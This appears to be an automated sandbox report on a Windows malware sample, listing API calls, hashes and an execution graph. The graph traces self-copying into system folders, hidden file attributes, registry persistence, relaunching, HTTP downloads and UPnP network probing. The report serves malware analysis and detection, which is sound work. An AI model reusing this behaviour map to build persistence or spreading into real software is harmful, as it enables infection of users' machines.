                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                                                                                                                                    • Opcode ID: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                                                                                                                                                                                                    • Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00416268), ref: 00406FF3
                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00407018
                                                                                                                                                                                                                                                      • Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407012
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 459949847-0
                                                                                                                                                                                                                                                    • Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                                                                                                                                                                                                    • Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                                                                                                                                                    • String ID: Microsoft Corporation
                                                                                                                                                                                                                                                    • API String ID: 586785272-3838278685
                                                                                                                                                                                                                                                    • Opcode ID: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                                                                                                                                                                                                    • Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                                                                                                                                                                                                      • Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
                                                                                                                                                                                                                                                      • Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
                                                                                                                                                                                                                                                      • Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                                                                                    • String ID: %S%S
                                                                                                                                                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                                                                                                                                                    • Opcode ID: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                                                                                                                                                                                                    • Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407A25), ref: 0040D64A
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                                                                                                                                                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                                                                                                                                                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                                                                                    • String ID: TCP$UDP
                                                                                                                                                                                                                                                    • API String ID: 1519345861-1097902612
                                                                                                                                                                                                                                                    • Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                                                                                                                                                                                                    • Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 528846559-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                                                                                    • Instruction ID: d1fe1851c25795fdacbee2e877de448503af208f5fff4c31293181607202da8f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11C574A04208EFCB04CF84D580E69B7B6FB89354F2081AAEC05AB385C735EE52DB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00415E30,?,?,?), ref: 00405EBF
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 469056452-0
                                                                                                                                                                                                                                                    • Opcode ID: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                                                                                                                                                                                                    • Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:14.1%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:1444
                                                                                                                                                                                                                                                    Total number of Limit Nodes:26
                                                                                                                                                                                                                                                    execution_graph 6034 40e121 6036 40e12a 6034->6036 6035 40e21d 6036->6035 6037 40e193 lstrcmpiW 6036->6037 6038 40e213 SysFreeString 6037->6038 6039 40e1a6 6037->6039 6038->6035 6040 40df10 2 API calls 6039->6040 6042 40e1b4 6040->6042 6041 40e205 6041->6038 6042->6038 6042->6041 6043 40e1e3 lstrcmpiW 6042->6043 6044 40e1f5 6043->6044 6045 40e1fb SysFreeString 6043->6045 6044->6045 6045->6041 5916 406045 5918 405fbe 5916->5918 5917 40604a LeaveCriticalSection 5918->5917 5919 40a220 8 API calls 5918->5919 5920 40601c 5919->5920 5920->5917 5921 407b49 5922 407b52 5921->5922 5923 407b61 34 API calls 5922->5923 5924 408996 5922->5924 5925 40a28e 5926 40a1b0 __aligned_recalloc_base 3 API calls 5925->5926 5928 40a24d 5926->5928 5927 409fa0 _invalid_parameter 7 API calls 5927->5928 5928->5927 5929 40a262 5928->5929 5930 40a264 memcpy 5928->5930 5930->5928 4357 407590 Sleep CreateMutexA GetLastError 4358 4075c6 ExitProcess 4357->4358 4359 4075ce 6 API calls 4357->4359 4360 407673 4359->4360 4361 40795a Sleep 4359->4361 4499 40e730 GetLocaleInfoA strcmp 4360->4499 4413 40c7d0 4361->4413 4366 407680 ExitProcess 4367 407688 ExpandEnvironmentStringsW wsprintfW CopyFileW 4370 407779 Sleep wsprintfW CopyFileW 4367->4370 4371 4076dc SetFileAttributesW RegOpenKeyExW 4367->4371 4368 407ae1 4369 407975 9 API calls 4416 405bc0 InitializeCriticalSection CreateFileW 4369->4416 5702 407440 4369->5702 5709 405880 4369->5709 5718 406bc0 Sleep GetModuleFileNameW 4369->5718 4374 4077c1 SetFileAttributesW RegOpenKeyExW 4370->4374 4375 40785e Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4370->4375 4371->4370 4373 407718 wcslen RegSetValueExW 4371->4373 4373->4370 4378 40774d RegCloseKey 4373->4378 4374->4375 4379 4077fd wcslen RegSetValueExW 4374->4379 4375->4361 4377 4078bd SetFileAttributesW RegOpenKeyExW 4375->4377 4377->4361 4381 4078f9 wcslen RegSetValueExW 4377->4381 4501 40e980 memset memset CreateProcessW 4378->4501 4379->4375 4383 407832 RegCloseKey 4379->4383 4381->4361 4385 40792e RegCloseKey 4381->4385 4387 40e980 6 API calls 4383->4387 4390 40e980 6 API calls 4385->4390 4392 40784b 4387->4392 4389 407a2a CreateEventA 4447 40bf00 4389->4447 4394 407947 4390->4394 4391 407771 ExitProcess 4392->4375 4395 407856 ExitProcess 4392->4395 4394->4361 4397 407952 ExitProcess 4394->4397 4404 40d160 328 API calls 4405 407a8a 4404->4405 4406 40d160 328 API calls 4405->4406 4407 407aa6 4406->4407 4408 40d160 328 API calls 4407->4408 4409 407ac2 4408->4409 4490 40d2d0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4409->4490 4411 407ad2 4507 40d410 4411->4507 4515 40c7a0 4413->4515 4417 405ce5 4416->4417 4418 405bf8 CreateFileMappingW 4416->4418 4429 40d640 CoInitializeEx 4417->4429 4419 405c19 MapViewOfFile 4418->4419 4420 405cd1 4418->4420 4419->4420 4421 405c38 GetFileSize 4419->4421 4420->4417 4428 405c4d 4421->4428 4422 405cc7 UnmapViewOfFile 4422->4420 4424 405c5c 4424->4422 4425 405c8c 4426 40a1b0 __aligned_recalloc_base 3 API calls 4425->4426 4426->4424 4428->4422 4428->4424 4428->4425 4644 40c820 4428->4644 4651 405cf0 4428->4651 4956 40d710 socket 4429->4956 4431 407a25 4442 406fe0 CoInitializeEx SysAllocString 4431->4442 4434 40d6aa 4981 40aa80 htons 4434->4981 4435 40d660 4435->4431 4435->4434 4441 40d6e8 4435->4441 4966 40d980 4435->4966 4440 40e470 24 API calls 4440->4441 5000 40a2d0 4441->5000 4443 407002 4442->4443 4444 407018 CoUninitialize 4442->4444 5145 407030 4443->5145 4444->4389 5154 40bec0 4447->5154 4450 40bec0 3 API calls 4451 40bf1e 4450->4451 4452 40bec0 3 API calls 4451->4452 4453 40bf2e 4452->4453 4454 40bec0 3 API calls 4453->4454 4455 407a42 4454->4455 4456 40d130 4455->4456 4457 409d90 7 API calls 4456->4457 4458 40d13b 4457->4458 4459 407a4c 4458->4459 4460 40d147 InitializeCriticalSection 4458->4460 4461 40b2c0 InitializeCriticalSection 4459->4461 4460->4459 4468 40b2da 4461->4468 4462 40b309 CreateFileW 4463 40b330 CreateFileMappingW 4462->4463 4464 40b3de 4462->4464 4463->4464 4466 40b351 MapViewOfFile 4463->4466 5209 40ab60 EnterCriticalSection 4464->5209 4466->4464 4469 40b36c GetFileSize 4466->4469 4468->4462 5161 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4468->5161 5162 40aea0 4468->5162 4476 40b38b 4469->4476 4470 40b3f7 4472 40d160 328 API calls 4470->4472 4473 407a56 4472->4473 4478 40d160 4473->4478 4474 40b3d4 UnmapViewOfFile 4474->4464 4476->4474 4477 40aea0 31 API calls 4476->4477 5212 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4476->5212 4477->4476 4479 40d177 EnterCriticalSection 4478->4479 4480 407a6f 4478->4480 5237 40d250 4479->5237 4480->4404 4483 40d23b LeaveCriticalSection 4483->4480 4484 409fe0 9 API calls 4485 40d1b9 4484->4485 4485->4483 4486 40d1cb CreateThread 4485->4486 4486->4483 4487 40d1ee 4486->4487 5241 40d550 4486->5241 5251 401f50 GetQueuedCompletionStatus 4486->5251 5258 40d5f0 4486->5258 5264 40cf00 4486->5264 5271 40b420 4486->5271 5277 401920 GetTickCount WaitForSingleObject 4486->5277 5300 40ceb0 4486->5300 4488 40d212 GetCurrentProcess GetCurrentProcess DuplicateHandle 4487->4488 4489 40d234 4487->4489 4488->4489 4489->4483 4491 40d306 InterlockedExchangeAdd 4490->4491 4492 40d3e9 GetCurrentThread SetThreadPriority 4490->4492 4491->4492 4493 40d320 4491->4493 4492->4411 4493->4492 4494 40d339 EnterCriticalSection 4493->4494 4495 40d3a7 LeaveCriticalSection 4493->4495 4496 40d3be 4493->4496 4497 40d383 WaitForSingleObject 4493->4497 4498 40d3dc Sleep 4493->4498 4494->4493 4495->4493 4495->4496 4496->4492 4497->4493 4498->4493 4500 407678 4499->4500 4500->4366 4500->4367 4502 40e9f1 ShellExecuteW 4501->4502 4503 40e9e2 Sleep 4501->4503 4505 40ea26 4502->4505 4506 40ea17 Sleep 4502->4506 4504 407766 4503->4504 4504->4370 4504->4391 4505->4504 4506->4504 4508 40d41c EnterCriticalSection 4507->4508 4514 40d492 4507->4514 4511 40d438 LeaveCriticalSection DeleteCriticalSection 4508->4511 4510 40a1b0 __aligned_recalloc_base 3 API calls 4512 40d486 4510->4512 4511->4510 4513 40a1b0 __aligned_recalloc_base 3 API calls 4512->4513 4513->4514 4514->4368 4518 40c3f0 4515->4518 4519 40c423 4518->4519 4520 40c40e 4518->4520 4523 40796a 4519->4523 4524 40c5d0 4519->4524 4558 40c450 4520->4558 4523->4368 4523->4369 4525 40c5f9 4524->4525 4526 40c6aa 4524->4526 4527 40c6a2 4525->4527 4584 409d90 4525->4584 4526->4527 4530 409d90 7 API calls 4526->4530 4527->4523 4531 40c6ce 4530->4531 4531->4527 4534 402420 7 API calls 4531->4534 4536 40c6f2 4534->4536 4535 409d90 7 API calls 4537 40c642 4535->4537 4538 409d90 7 API calls 4536->4538 4592 4024e0 4537->4592 4540 40c701 4538->4540 4542 4024e0 10 API calls 4540->4542 4541 40c66b 4595 40a1b0 4541->4595 4544 40c72a 4542->4544 4546 40a1b0 __aligned_recalloc_base 3 API calls 4544->4546 4548 40c736 4546->4548 4547 402420 7 API calls 4550 40c688 4547->4550 4549 402420 7 API calls 4548->4549 4551 40c747 4549->4551 4552 4024e0 10 API calls 4550->4552 4553 4024e0 10 API calls 4551->4553 4552->4527 4554 40c761 4553->4554 4555 402420 7 API calls 4554->4555 4556 40c772 4555->4556 4557 4024e0 10 API calls 4556->4557 4557->4527 4559 40c502 4558->4559 4560 40c479 4558->4560 4562 409d90 7 API calls 4559->4562 4583 40c4fa 4559->4583 4561 409d90 7 API calls 4560->4561 4560->4583 4563 40c48c 4561->4563 4564 40c528 4562->4564 4565 402420 7 API calls 4563->4565 4563->4583 4566 402420 7 API calls 4564->4566 4564->4583 4567 40c4b5 4565->4567 4568 40c555 4566->4568 4569 4024e0 10 API calls 4567->4569 4570 4024e0 10 API calls 4568->4570 4571 40c4cf 4569->4571 4572 40c56f 4570->4572 4573 402420 7 API calls 4571->4573 4574 402420 7 API calls 4572->4574 4575 40c4e0 4573->4575 4576 40c580 4574->4576 4577 4024e0 10 API calls 4575->4577 4578 4024e0 10 API calls 4576->4578 4577->4583 4579 40c59a 4578->4579 4580 402420 7 API calls 4579->4580 4581 40c5ab 4580->4581 4582 4024e0 10 API calls 4581->4582 4582->4583 4583->4523 4602 409db0 4584->4602 4587 402420 4623 409fa0 4587->4623 4630 402540 4592->4630 4594 4024ff __aligned_recalloc_base 4594->4541 4640 409e50 GetCurrentProcessId 4595->4640 4597 40a1bb 4598 40a1c2 4597->4598 4641 40a0f0 4597->4641 4598->4547 4601 40a1d7 RtlFreeHeap 4601->4598 4611 409e50 GetCurrentProcessId 4602->4611 4604 409dbb 4605 409dc7 _invalid_parameter 4604->4605 4612 409e70 4604->4612 4607 409d9e 4605->4607 4608 409de2 RtlAllocateHeap 4605->4608 4607->4527 4607->4587 4608->4607 4609 409e09 _invalid_parameter 4608->4609 4609->4607 4610 409e24 memset 4609->4610 4610->4607 4611->4604 4620 409e50 GetCurrentProcessId 4612->4620 4614 409e79 4615 409e96 HeapCreate 4614->4615 4621 409ee0 GetProcessHeaps 4614->4621 4616 409eb0 HeapSetInformation GetCurrentProcessId 4615->4616 4617 409ed7 4615->4617 4616->4617 4617->4605 4620->4614 4622 409e8c 4621->4622 4622->4615 4622->4617 4624 409db0 _invalid_parameter 7 API calls 4623->4624 4625 40242b 4624->4625 4626 402820 4625->4626 4627 40282a 4626->4627 4628 409fa0 _invalid_parameter 7 API calls 4627->4628 4629 402438 4628->4629 4629->4535 4631 40258e 4630->4631 4633 402551 4630->4633 4632 409fa0 _invalid_parameter 7 API calls 4631->4632 4631->4633 4635 4025b2 _invalid_parameter 4632->4635 4633->4594 4634 4025e2 memcpy 4636 402606 _invalid_parameter 4634->4636 4635->4634 4637 40a1b0 __aligned_recalloc_base 3 API calls 4635->4637 4638 40a1b0 __aligned_recalloc_base 3 API calls 4636->4638 4639 4025df 4637->4639 4638->4633 4639->4634 4640->4597 4642 40a120 HeapValidate 4641->4642 4643 40a140 4641->4643 4642->4643 4643->4598 4643->4601 4661 40a220 4644->4661 4647 40c861 4647->4428 4650 40a1b0 __aligned_recalloc_base 3 API calls 4650->4647 4874 409fe0 4651->4874 4654 405d2a memcpy 4655 40a220 8 API calls 4654->4655 4656 405d61 4655->4656 4884 40c190 4656->4884 4659 405de8 4659->4428 4662 40a24d 4661->4662 4663 409fa0 _invalid_parameter 7 API calls 4662->4663 4664 40a262 4662->4664 4665 40a264 memcpy 4662->4665 4663->4662 4664->4647 4666 40bd30 4664->4666 4665->4662 4670 40bd3a 4666->4670 4668 40bd59 4668->4647 4668->4650 4670->4668 4671 40bd71 memcmp 4670->4671 4672 40bd98 4670->4672 4674 40a1b0 __aligned_recalloc_base 3 API calls 4670->4674 4675 40c220 4670->4675 4689 407af0 4670->4689 4671->4670 4673 40a1b0 __aligned_recalloc_base 3 API calls 4672->4673 4673->4668 4674->4670 4676 40c22f _invalid_parameter 4675->4676 4677 409fa0 _invalid_parameter 7 API calls 4676->4677 4679 40c239 4676->4679 4678 40c2c8 4677->4678 4678->4679 4680 402420 7 API calls 4678->4680 4679->4670 4681 40c2dd 4680->4681 4682 402420 7 API calls 4681->4682 4683 40c2e5 4682->4683 4685 40c33d _invalid_parameter 4683->4685 4692 40c390 4683->4692 4697 402470 4685->4697 4688 402470 3 API calls 4688->4679 4805 409d10 4689->4805 4693 4024e0 10 API calls 4692->4693 4694 40c3a4 4693->4694 4703 4026f0 4694->4703 4696 40c3bc 4696->4683 4699 402484 _invalid_parameter 4697->4699 4700 4024ce 4697->4700 4698 40a1b0 __aligned_recalloc_base 3 API calls 4698->4700 4701 40a1b0 __aligned_recalloc_base 3 API calls 4699->4701 4702 4024ac 4699->4702 4700->4688 4701->4702 4702->4698 4706 402710 4703->4706 4705 40270a 4705->4696 4707 402724 4706->4707 4708 402540 __aligned_recalloc_base 10 API calls 4707->4708 4709 40276d 4708->4709 4710 402540 __aligned_recalloc_base 10 API calls 4709->4710 4711 40277d 4710->4711 4712 402540 __aligned_recalloc_base 10 API calls 4711->4712 4713 40278d 4712->4713 4714 402540 __aligned_recalloc_base 10 API calls 4713->4714 4715 40279d 4714->4715 4716 4027a6 4715->4716 4717 4027cf 4715->4717 4721 403e20 4716->4721 4738 403df0 4717->4738 4720 4027c7 __aligned_recalloc_base 4720->4705 4722 402820 _invalid_parameter 7 API calls 4721->4722 4723 403e37 4722->4723 4724 402820 _invalid_parameter 7 API calls 4723->4724 4725 403e46 4724->4725 4726 402820 _invalid_parameter 7 API calls 4725->4726 4727 403e55 4726->4727 4728 402820 _invalid_parameter 7 API calls 4727->4728 4729 403e64 _invalid_parameter __aligned_recalloc_base 4728->4729 4731 40400f _invalid_parameter 4729->4731 4741 402850 4729->4741 4732 402850 _invalid_parameter 3 API calls 4731->4732 4733 404035 _invalid_parameter 4731->4733 4732->4731 4734 402850 _invalid_parameter 3 API calls 4733->4734 4735 40405b _invalid_parameter 4733->4735 4734->4733 4736 402850 _invalid_parameter 3 API calls 4735->4736 4737 404081 4735->4737 4736->4735 4737->4720 4745 404090 4738->4745 4740 403e0c 4740->4720 4742 402866 4741->4742 4743 40285b 4741->4743 4742->4729 4744 40a1b0 __aligned_recalloc_base 3 API calls 4743->4744 4744->4742 4746 4040a6 _invalid_parameter 4745->4746 4747 4040b8 _invalid_parameter 4746->4747 4748 4040dd 4746->4748 